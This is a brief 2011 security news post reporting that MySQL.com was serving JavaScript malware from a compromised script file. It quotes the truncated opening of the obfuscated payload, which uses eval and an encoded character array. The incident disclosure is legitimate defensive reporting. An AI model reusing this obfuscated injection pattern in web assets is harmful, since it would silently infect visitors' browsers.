The Latest in IT Security

MySQL.com Hacked (Javascript Malware)

26
Sep
2011


It looks like the MySQL.com website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it).

Our scanner identified the malware as mwjs159 which is often related to stolen FTP passwords. So it looks like one of their developers got their desktop compromised and had his password stolen. From our scanner:

So the compromised file was http://mysql.com/common/js/s_code_remote.js and we recommend that you do not visit the site right now. We will post more details as we learn more about it…

Try view-source:http://mysql.com/common/js/s_code_remote.js if you want to see the malicious code on the site. It starts as:

Object.prototype.qwe=function(){return
String.fromCharCode;};Object.prototype.asd="e";var s="";try{{}["qwtqwt"]
();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode("123")
.data&&typeof{}.asd.vfr===’undefined’)n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …

Leave a reply


Categories

THURSDAY, SEPTEMBER 19, 2019
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments

Social Networks